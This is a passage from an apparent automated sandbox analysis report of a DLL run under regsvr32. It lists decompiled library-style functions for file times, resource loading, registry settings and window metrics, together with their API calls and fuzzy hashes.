                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                        • Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
                                                                        • Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                        • Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10026B4F Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10026B4F(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E10011C50(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x100401d4; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}



















                                                                        0x10026b57
                                                                        0x10026b64
                                                                        0x10026b66
                                                                        0x10026b7a
                                                                        0x10026b80
                                                                        0x10026b83
                                                                        0x10026b89
                                                                        0x10026c56
                                                                        0x00000000
                                                                        0x10026c58
                                                                        0x10026b97
                                                                        0x10026ba4
                                                                        0x10026bbf
                                                                        0x00000000
                                                                        0x10026bbf
                                                                        0x10026baa
                                                                        0x10026bb3
                                                                        0x10026bb6
                                                                        0x10026bb9
                                                                        0x10026bc6
                                                                        0x10026bcc
                                                                        0x10026be4
                                                                        0x10026bce
                                                                        0x10026bce
                                                                        0x10026bce
                                                                        0x10026bf0
                                                                        0x10026bf7
                                                                        0x10026bfc
                                                                        0x10026c08
                                                                        0x10026c0f
                                                                        0x10026c15
                                                                        0x10026c21
                                                                        0x10026c28
                                                                        0x10026c2e
                                                                        0x10026c36
                                                                        0x10026c3a
                                                                        0x10026c3f
                                                                        0x10026c3f
                                                                        0x10026c48
                                                                        0x10026c4d
                                                                        0x10026c53
                                                                        0x10026c53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
                                                                        • GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
                                                                        • GetFileAttributesA.KERNEL32(?), ref: 10026BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesSizeTimelstrcpyn
                                                                        • String ID:
                                                                        • API String ID: 1499663573-0
                                                                        • Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                        • Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
                                                                        • Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                        • Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000C29A Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E1000C29A(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x10043098);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E10011C50( &_v56, 0, 0x20);
							E10011C50( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E1000A823(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}





















                                                                        0x1000c2a5
                                                                        0x1000c2b3
                                                                        0x00000000
                                                                        0x1000c2b5
                                                                        0x1000c2c3
                                                                        0x1000c2c6
                                                                        0x1000c2fa
                                                                        0x1000c300
                                                                        0x1000c30d
                                                                        0x1000c313
                                                                        0x1000c319
                                                                        0x1000c31a
                                                                        0x1000c31f
                                                                        0x1000c324
                                                                        0x1000c329
                                                                        0x1000c332
                                                                        0x1000c33e
                                                                        0x1000c343
                                                                        0x1000c368
                                                                        0x1000c36e
                                                                        0x1000c374
                                                                        0x1000c377
                                                                        0x1000c37c
                                                                        0x1000c37c
                                                                        0x1000c381
                                                                        0x1000c386
                                                                        0x1000c386
                                                                        0x1000c38b
                                                                        0x1000c390
                                                                        0x1000c390
                                                                        0x1000c392
                                                                        0x1000c398
                                                                        0x1000c39e
                                                                        0x1000c3a0
                                                                        0x1000c3a0
                                                                        0x1000c39e
                                                                        0x1000c329
                                                                        0x1000c3aa
                                                                        0x00000000
                                                                        0x1000c2c8
                                                                        0x1000c2ce
                                                                        0x1000c2d5
                                                                        0x1000c2d8
                                                                        0x1000c2db
                                                                        0x1000c2de
                                                                        0x1000c2e1
                                                                        0x1000c2e4
                                                                        0x1000c2e7
                                                                        0x1000c2ea
                                                                        0x1000c2ef
                                                                        0x1000c2f4
                                                                        0x1000c3ac
                                                                        0x00000000
                                                                        0x1000c3ac
                                                                        0x00000000
                                                                        0x1000c2f4

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString$ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 3349467263-0
                                                                        • Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                        • Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
                                                                        • Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                        • Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10036A6D Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t22;
				signed short _t23;
				void* _t24;
				signed int _t29;
				signed short _t31;
				void* _t37;
				signed short _t38;
				signed short* _t47;
				void* _t53;
				struct HINSTANCE__* _t56;
				void* _t58;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_t56 =  *(E100373B5() + 0xc);
				_t22 = FindResourceA(_t56, _a4, 0xf1);
				if(_t22 == 0) {
					L3:
					_t23 = 0;
				} else {
					_t24 = LoadResource(_t56, _t22);
					_v12 = _t24;
					if(_t24 == 0) {
						goto L3;
					} else {
						_t58 = LockResource(_t24);
						if(_t58 != 0) {
							_push(_t37);
							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
							_t29 = 0;
							__eflags =  *(_t58 + 6);
							if( *(_t58 + 6) > 0) {
								_t7 = _t58 + 8; // 0x8
								_t47 = _t7;
								do {
									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
									_t29 = _t29 + 1;
									_t47 =  &(_t47[1]);
									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
							}
							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
							_push(_t53);
							_t38 = _t31;
							L1001F7A9(_t38, _t53, _t58, __eflags);
							__eflags = _t38;
							if(_t38 != 0) {
								_t44 =  *(_t58 + 4) & 0x0000ffff;
								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
								_t38 = E1003697A(_v8, _a4);
							}
							FreeResource(_v12);
							_t23 = _t38;
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}




















                                                                        0x10036a70
                                                                        0x10036a71
                                                                        0x10036a73
                                                                        0x10036a7b
                                                                        0x10036a87
                                                                        0x10036a8f
                                                                        0x10036aad
                                                                        0x10036aad
                                                                        0x10036a91
                                                                        0x10036a93
                                                                        0x10036a9b
                                                                        0x10036a9e
                                                                        0x00000000
                                                                        0x10036aa0
                                                                        0x10036aa7
                                                                        0x10036aab
                                                                        0x10036ab5
                                                                        0x10036ac0
                                                                        0x10036ac2
                                                                        0x10036ac4
                                                                        0x10036ac9
                                                                        0x10036acb
                                                                        0x10036acb
                                                                        0x10036ace
                                                                        0x10036ad1
                                                                        0x10036ad8
                                                                        0x10036ada
                                                                        0x10036adb
                                                                        0x10036adb
                                                                        0x10036ace
                                                                        0x10036ae8
                                                                        0x10036aed
                                                                        0x10036aee
                                                                        0x10036af0
                                                                        0x10036af5
                                                                        0x10036af8
                                                                        0x10036afa
                                                                        0x10036b0f
                                                                        0x10036b1f
                                                                        0x10036b1f
                                                                        0x10036b24
                                                                        0x10036b2b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10036aab
                                                                        0x10036a9e
                                                                        0x10036b30

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 10036A93
                                                                        • LockResource.KERNEL32(00000000), ref: 10036AA1
                                                                        • FreeResource.KERNEL32(?), ref: 10036B24
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                        • Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
                                                                        • Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                        • Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002C73E Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICA _v108;
				void* __ebp;
				long _t25;
				int _t35;
				intOrPtr* _t40;
				void* _t43;
				intOrPtr _t53;
				intOrPtr* _t59;
				intOrPtr _t60;

				_t59 = __ecx;
				_push(0);
				E100290F7( &_v52);
				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_t43 = 0;
				if(_t25 != 0) {
					_t43 = E1000866D( &_v52, _t25);
				}
				GetTextMetricsA(_v44,  &_v108);
				_t62 = _t43;
				if(_t43 != 0) {
					E1000866D( &_v52, _t43);
				}
				E10029152( &_v52, _t62);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
				_t35 = GetSystemMetrics(6);
				_t60 =  *((intOrPtr*)(_t59 + 0x90));
				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
				if(_t53 < _t60) {
					_t53 = _t60;
				}
				_t40 = _a4;
				 *_t40 = 0x7fff;
				 *((intOrPtr*)(_t40 + 4)) = _t53;
				return _t40;
			}

















                                                                        0x1002c747
                                                                        0x1002c74b
                                                                        0x1002c74f
                                                                        0x1002c75b
                                                                        0x1002c761
                                                                        0x1002c765
                                                                        0x1002c770
                                                                        0x1002c770
                                                                        0x1002c779
                                                                        0x1002c77f
                                                                        0x1002c781
                                                                        0x1002c787
                                                                        0x1002c787
                                                                        0x1002c78f
                                                                        0x1002c798
                                                                        0x1002c7a9
                                                                        0x1002c7bd
                                                                        0x1002c7d0
                                                                        0x1002c7dc
                                                                        0x1002c7e9
                                                                        0x1002c7ef
                                                                        0x1002c7f1
                                                                        0x1002c7f1
                                                                        0x1002c7f3
                                                                        0x1002c7f8
                                                                        0x1002c7fa
                                                                        0x1002c7ff

                                                                        APIs
                                                                          • Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
                                                                          • Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A
                                                                        • SendMessageA.USER32 ref: 1002C75B
                                                                        • GetTextMetricsA.GDI32(?,?), ref: 1002C779
                                                                        • SetRectEmpty.USER32(?), ref: 1002C798
                                                                        • GetSystemMetrics.USER32 ref: 1002C7D0
                                                                          • Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
                                                                        • String ID:
                                                                        • API String ID: 1847300772-0
                                                                        • Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                        • Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
                                                                        • Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                        • Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10034B35 Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10034B35(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x1004b390; // 0x1003d660
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x1004b390;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x1004b358
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}














                                                                        0x10034b3f
                                                                        0x10034b45
                                                                        0x10034b4b
                                                                        0x10034b4e
                                                                        0x10034b51
                                                                        0x10034b54
                                                                        0x10034b5b
                                                                        0x10034b5e
                                                                        0x10034b63
                                                                        0x10034bf1
                                                                        0x10034bf2
                                                                        0x10034bfe
                                                                        0x10034bfe
                                                                        0x10034b6a
                                                                        0x10034b80
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034b82
                                                                        0x10034b82
                                                                        0x10034bd3
                                                                        0x10034bd3
                                                                        0x10034bd7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034ba0
                                                                        0x10034bab
                                                                        0x10034bae
                                                                        0x10034bae
                                                                        0x10034bb1
                                                                        0x10034bbd
                                                                        0x10034bb3
                                                                        0x10034bb3
                                                                        0x10034bb3
                                                                        0x10034bb1
                                                                        0x10034bc3
                                                                        0x10034bc6
                                                                        0x10034bcd
                                                                        0x10034bd0
                                                                        0x10034bd0
                                                                        0x10034bd9
                                                                        0x10034bdc
                                                                        0x10034be2
                                                                        0x10034be7
                                                                        0x10034be7
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10034BDC
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 10034BF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Close$OpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 1607946009-0
                                                                        • Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                        • Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
                                                                        • Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                        • Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10026A96 Relevance: 6.1, APIs: 4, Instructions: 67timeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v44;
				void* __ebp;
				int _t23;
				int _t26;
				int _t29;
				int _t31;
				void* _t40;
				void* _t56;
				void* _t59;

				_t47 = __edx;
				_t40 = __ecx;
				_t56 = _t59;
				if(_a8 != 0) {
					_t52 = _a4;
					_v28.wYear = E10010297(__eflags);
					_v28.wMonth = E100102AE(__eflags);
					_t23 = E100134E7(_a4, __edx, _a4);
					__eflags = _t23;
					if(__eflags == 0) {
						_v28.wDay = 0;
					} else {
						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
					}
					_v28.wHour = E100102C1(__eflags);
					_v28.wMinute = E100102D4(__eflags);
					_t26 = E100134E7(_t52, _t47, _t52);
					__eflags = _t26;
					if(_t26 == 0) {
						_t14 =  &(_v28.wSecond);
						 *_t14 = _v28.wSecond | 0x0000ffff;
						__eflags =  *_t14;
					} else {
						_v28.wSecond =  *_t26;
					}
					_v28.wMilliseconds = 0;
					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
					__eflags = _t29;
					if(_t29 == 0) {
						E100271C6(_t56, GetLastError(), 0);
					}
					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
					__eflags = _t31;
					if(_t31 == 0) {
						_t31 = E100271C6(_t56, GetLastError(), 0);
					}
					return _t31;
				} else {
					_push(_t56);
					_push(__ecx);
					_v44 = 0x1004d548;
					E10011C0F( &_v44, 0x10045e48);
					asm("int3");
					return  *((intOrPtr*)(_t40 + 0x70));
				}
			}














                                                                        0x10026a96
                                                                        0x10026a96
                                                                        0x10026a97
                                                                        0x10026aa3
                                                                        0x10026aaa
                                                                        0x10026ab6
                                                                        0x10026ac0
                                                                        0x10026ac4
                                                                        0x10026ac9
                                                                        0x10026acc
                                                                        0x10026ad8
                                                                        0x10026ace
                                                                        0x10026ad2
                                                                        0x10026ad2
                                                                        0x10026ae5
                                                                        0x10026aef
                                                                        0x10026af3
                                                                        0x10026af8
                                                                        0x10026afb
                                                                        0x10026b06
                                                                        0x10026b06
                                                                        0x10026b06
                                                                        0x10026afd
                                                                        0x10026b00
                                                                        0x10026b00
                                                                        0x10026b14
                                                                        0x10026b18
                                                                        0x10026b1e
                                                                        0x10026b26
                                                                        0x10026b2c
                                                                        0x10026b2c
                                                                        0x10026b38
                                                                        0x10026b3e
                                                                        0x10026b40
                                                                        0x10026b46
                                                                        0x10026b46
                                                                        0x10026b4e
                                                                        0x10026aa5
                                                                        0x1001ce6f
                                                                        0x1001ce72
                                                                        0x1001ce7c
                                                                        0x1001ce83
                                                                        0x1001ce88
                                                                        0x1001ce8c
                                                                        0x1001ce8c

                                                                        APIs
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
                                                                        • GetLastError.KERNEL32(00000000), ref: 10026B29
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
                                                                        • GetLastError.KERNEL32(00000000), ref: 10026B43
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$ErrorLast$LocalSystem
                                                                        • String ID:
                                                                        • API String ID: 1172841412-0
                                                                        • Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
